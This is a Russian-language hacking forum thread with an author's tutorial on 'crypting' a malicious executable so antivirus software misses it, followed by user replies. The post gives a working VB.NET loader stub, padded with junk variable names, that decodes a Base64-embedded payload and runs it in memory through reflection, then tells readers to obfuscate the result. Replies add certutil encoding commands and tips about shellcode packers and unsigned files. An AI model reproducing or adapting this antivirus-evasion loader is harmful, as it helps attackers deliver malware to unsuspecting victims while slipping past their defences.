Статья прячем вредоносный файл (криптовка ехе)

приветствую всех!) В последнее время заметил что у нас не хватает хард-кора как в былые времена) хех, будем исправлять! Представлю Вашему вниманию способ ручной криптовки вредоносного файла на языке visual basic

Открываем visual-studio, создаем новый проект.

и добавляем простой модуль)

и вставляем содержимое:

​

module module1
    Dim KvCNAb As String = "OShsVHguqFKtJCNMyhGvWShHHS"
    Dim NysgqucHukACdAGRVasNmKWRyi As String = "CdmNbayBJHNCsymvsRCHsHgHiMGsBrvjyyBSgitAEC"
    Dim uMHACNOFhOTsgkMcHVBCBCBEmS As String = "gOhBcCNEqSiscNMKbEvBhhggtuhCsMNMVGuMhSBgRH"
    Dim hcrucNgRBktbmGsssjqMsCCgVR As String = "hGgcuyWhAOgNcraAACihSurrAhvNNBSFEHsusABmHVRsasrhCFCkNsaCtTvONchNaMitdNCrBWucFsihBChOsWCusrrdcCHCViVuSusVsF"
    Dim FEiarSHNBVCMHgHamsGVcOcAsGsKWaNgycCyCivCSHdVsskAEiKrbtHvgrhsNBBigEMysdmCBgbigANrrNsAcgVJgh As String = "CEMcNHdkuHrgsHHqjVstNHiCEssbrBWmuNBcFjNuvB"
    Dim server() As Byte = Convert.FromBase64String("")
    Dim HdBcVRNtsHAgbOgsHcgaHCcdsuCSVNaAKRsrVJusNFBsOCFgBisbsAusCC As String = "BuHuWWsgFsHVErcNCuFhBBCtcGAFCugsmTVHjShMVa"
    Dim RagWAVdHCWssBHahvWNVBsSsjk As String = "NjshOGGjgFGcrKGdNrbHcJBFNBHJVTNiRaisgqMcKHBsyCmBVaygANKTuVMugFsSHVNuNVSshCrMHNKBsiHggsFJqA"
    Dim KFbuHBAsCNqmWCFABvvhyTsbMOgVcSNKRsNssVMHsO As String = "VvNNimTSNassaTsMgCgsEvVgNKMMicGMmjsCCkgCWKrKuHCkvddNamiWSE"
    Dim ABbACsSMANihrJWMrqgCTssisCasqVJrjHRKCENCgVgaqqWKguRMEBmAVgVKgNNhrNCargVraC As String = "qiGmsAFVghhCNhCgrdAVCBcgMisHTsdTaShtarshMGvasFtrtOFgBHGTjMNHMCKssiNCNTCrEGJMdrHaahCmagKcVF"
    Dim rMEHHuhATCaWhgdMKCigMRshSW As String = "vdCsBhrsvNNKHsSOJkaNHjCvuWuOsuRGKChFNthTyKHuCadaTAHiGRGaVg"
    Sub Main(ByVal kSsAggcSSuvrqFhWaSOisssyNuiWrNqhFcsEMMcSOHGSMrHujghdErsBhCBRMAHyCGSRVVNSHJHhgMHABsCsdghsaA() As String)
        Dim dCVrmTCBsSVvmiFCCSgNFjBhJsgrKhsCCajHgaCrHcmAsCCEgNAjjGmScChBgHCBBbEgHWBNhW As String = "HuMiaharBVNabhyNrsacNdySbcdqgCHHuMRhArGddEHccgOsFHjuaGBHBsCFVasCFaEvqmTvmy"
        Dim NskNhrHRHciVcduFNShNtuJabS As String = "hHhdCVmTGVEsMMsrHRChsGNjcVhOKMsNSFCVgHsCHgbcmsGSNRijkssahHsBaVhCKhNJMahTSFvciyFsdsaVyBiJSHtAhSgNujcBHVNNyT"
        Dim dargShFSBvmWssmmjTcNBhGugK As String = "icsbBskAAShBCFGgNsrrqCSFbmGNKbNBaHcBhHirhmacsCjuuhRsTNVgThKirjqMthcskEsNrS"
        Dim MghjgFBshWatNMsujrackSROmsiEBGEuVHsAgscaaBFiRgcgVkjvvSyNssORmgmCddgdugsiSNCFsCsCMmiiCBAsFu As String = "NHuNMmtNCJSBavMvHiiFbydAiGaRgdhyHviSBsgHsrsByuSdiiEtuRksAi"
        Dim aNiTEBsNvhdvrqMgOmhKuHySGN As String = "BASTVhdCHsNrJJGNbciSCNdVVBkKBqEVgvJBJhHNHh"
        Dim OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj() As Object = New Object(-1) {}
        Dim ssrVSVcrsCEdHFMgCvsNMmdstC As String = "vCGhhJyhChHGrHHHiSrGChSMMBVNsGdrsidTTiuEdgBBccHuGWCNcFdTjF"
        Dim bBuGrTsSCNCgBjtshONtsFsNvN As String = "MkKrCcaSbrBahGFSkVmsGuFSbFKuRcsFCSsciaiisHsvCKyMhvHMsVssar"
        Dim NsSuiHggNsBbFujEaCKhKasrWs As String = "NNVFAOiutsaVhhscjShiGigHJgHuFcMvhgiHBhyiJs"
        Dim SqSrHGSVBaSagASBruNVRHHtNCHhFFCMgSCTGTtEEBhVtRNcJsFiBsaqTNruNiCaBgTmAdstaRHTHybMyyHGNAOiFimshFiVHBhHsdFgqNhHcsuaVByNjKmSHC As String = "jNWNssacsKGNhhumuHCgththCsNBNcHhOMhCvshNCG"
        Dim hhhNdgNSrsNbrEsRsWBVvSBiRGJFvStMSiHWBqvOCc As String = "hCCucrCEsEJWMyaVbvHKhrvbsmHbNCMWgOiOvCgHAKWkacsCMVKChtsMBsCCqhESuusrssCAVyNCCmtiScNsNdAsrS"
        Dim FdcaOVssNNHsivOSyssdgtCrFS As System.Reflection.Assembly = AppDomain.CurrentDomain.Load(server)
        Dim AkrrvKVMFhqigqABssHCiyRMAHyimiNHhCgrsCsCbaaCvSmdCsSbSsjSyc As String = "iBAOAAEHFHcgBsEOyrsFFqrSAg"
        Dim uhgFskGhmJycHBHdubBmsdSdiNHMBSMrrNrcmisrHbWVurbBSdBaNSmsmVSBdVFBBgatchustV As String = "EsCOcsECiCahBsOsKNharsvyGK"
        Dim aNgBBdsugcauqhsOuvhNKhhHgMCBrCsWHCHBhKaEbg As String = "qiiHBcsAWENihCSkVuSaAkOgac"
        Dim viBhsgtvAhurhhtKyVCsWNGsGOWCCyChrBCagEsshkshyMSsHtaNCrHOvG As String = "OdNVcussGcmVGcgaicCSuBbCss"
        Dim CrgBChgHSsSdAhasHtWEGCcVuMMsNsaCsTHrKyHiNRhSsCThETckjMBGAaCGsqNhVNCGhKsANsvAsmHTcbhNuCFMJrrHHgAhaSBqHvNmNBBssuKdCrmiNKdAkCMVhHsAdhGBqHBKCiMhBsGgvssVNhsFSj As String = "sMHHcSHMNaaqGqHENmuNCHqWJs"
        If FdcaOVssNNHsivOSyssdgtCrFS.EntryPoint.GetParameters().Length > 0 Then
            Dim CqhTsSdgFckAuAsjHCVFNrNJrGiVEHdBryTEskGMShJGSHKsyaaHsmWhhEcCkjNdsimggEgCHhgHFcNsVhSrNhsskR As String = "OShsVHguqFKtJCNMyhGvWShHHS"
            Dim igFWqCCdmHVisiScvdCrNbbdtHHSEsNNdNAHBcsJCAABiNGqdcKvqbMRKs As String = "FNHiKuBhAHivFTSsuhVNGCWsghEOsNCmgVSGEONaBG"
            Dim cNsMhgsVhAcTcVCmNCsEsAHihH As String = "NNNaiWGySJsOMjCGKastsHckiGsHstHssCusuGFHGsVsGuBOhEJOMmCCGh"
            Dim gAiBigiScbTOrgdquVtCcSqaJH As String = "hiHVBNrmBdHsmdiTVHcAFiMGyMHMNvsssSmCAsNrCtuBCtCghNmaErHigCHHrTMAHCMhycFuTa"
            Dim SsBMbhhBBvcHgSBNAkuhSmWTGN As String = "aNKKuKahrgAiHGCsgikNhsJHgCKgFuSShjshhSCugHJKthsyqKOTjNHshNhKTOHdViSVvBMgKbhrAghGBThAgGFsga"
            OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj = New Object() {FdcaOVssNNHsivOSyssdgtCrFS}
        End If
        Dim tsSvVhMVicMWumNHNHVMvdCSbr As String = "dScVsEBiNsriajSHWHMhHhHTKFMTdbgBSFsMahGgAacJHAMsSSMrEJENCO"
        Dim CdaHNNbKEcNHghTgsHuSgmaBCN As String = "KWchsNHidsyHHVhssbNBNvcHvbNscvNBcshbSstBCa"
        Dim tsctkishNcEcqtjMCsBbssAhaNvrMgBhNKFkbRBsCNiHiOgBBTvRCNqANHsaKgcrsHvmBFghNRhEuhHuACsjNiyHsV As String = "gCssdHhVBScHRHrVhvgqANgMrgFrAiChcMSkMsCautyFhcihJhcgKNNWsNmRrCCNisGgsBvrgi"
        Dim HsrBTsBEHaSAsCSyWsgGCssgBu As String = "uFVuNcAsdJOdOcBvMhVcMajCAdTsshCiqJqKHjHGCOMGssNsWiuaKAHTqu"
        Dim NshRMVicmAaHTGgHmBCjSuJNtj As String = "HqNNusTcVcChHHBWvtHVqEshscABCsANCrdMsFgKMCssHrrVGvsSvsishmCqBsCqdauVWscsBShaCmRCrKkqThABuCShahHkSumhGhNuHd"
        FdcaOVssNNHsivOSyssdgtCrFS.EntryPoint.Invoke(Nothing, OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj)
    End Sub

End Module

далее, берем нашу злую приложеньку которая палится всеми "добрыми" антивирусными программами, конвертируем в формат base64 и вставляем в 7-ую строку нашего замечательного модуля)

почти все готово, далее идем в свойства нашего нашего будущего ангельского приложения.

ииииииииииии собираем)

далее мы его обфусцируем (сожмем в размере и спрячем код) в прожке

Ссылка скрыта от гостей

и стартуем)


фсйо наша приложенька стала доброй и пушистой, почти)


а вот и хард-кор унизу): все как мы любим!

Good Luck! (гуд-лацк по Русски)


​

 

[Pernat1y]

и что это приложение или что ? можешь скинуть ссылку или это инструмент?

Это встроенные команды в линуксе.
Если под винду, то можно через certutil:

certutil -encode test.exe test.txt
certutil -decode test.txt test.exe

 

[Ondrik8]

Это встроенные команды в линуксе.
Если под винду, то можно через certutil:

certutil -encode test.exe test.txt
certutil -decode test.txt test.exe

но поведение будет палится, как транспортировка, да) как лоадер, да)
а вообще сейчас тренд работать с шелкодом пакер и выгрузка в память и его вызов...

но сейчас алерты и т.д. темы умирают с прогрузом так как файлы не подписаны, то есть все решает подпись!

ПС это все решается, геморно но решается....

 

[phongthan2023]

nhưng hành vi sẽ bị cháy sém, như vận chuyển, vâng) như người bốc xếp, vâng)
nhưng nói chung, bây giờ xu hướng là làm việc với mã lụa của trình đóng gói và tải vào bộ nhớ và gọi nó là ...

nhưng bây giờ cảnh báo, vv các chủ đề chết khi tải vì các tệp không được ký, tức là mọi thứ đều do chữ ký quyết định!

PS tất cả đã được giải quyết, gemorno nhưng đã được giải quyết ....

bạn có thể làm video hướng dẫn cụ thể được không cảm ơn bạn nhiều

 

[phongthan2023]

можешь сделать конкретный видеоурок большое спасибо

но поведение будет палится, как транспортировка, да) как лоадер, да)
а вообще сейчас тренд работать с шелкодом пакер и выгрузка в память и его вызов...

но сейчас алерты и т.д. темы умирают с прогрузом так как файлы не подписаны, то есть все решает подпись!

ПС это все решается, геморно но решается....

можешь сделать конкретный видеоурок большое спасибо

 

[Mark Wolf]

Добрый день. Подскажите как это сделать?

 

[Mark Wolf]

застрял на этом
"далее, берем нашу злую приложеньку которая палится всеми "добрыми" антивирусными программами, конвертируем в формат base64 и вставляем в 7-ую строку нашего замечательного модуля)"
если тут ещё кто то есть, помогите XD

 

[Exited3n]

застрял на этом
"далее, берем нашу злую приложеньку которая палится всеми "добрыми" антивирусными программами, конвертируем в формат base64 и вставляем в 7-ую строку нашего замечательного модуля)"
если тут ещё кто то есть, помогите XD

Там на скриншоте прям стрелкой красной показано куда пихать.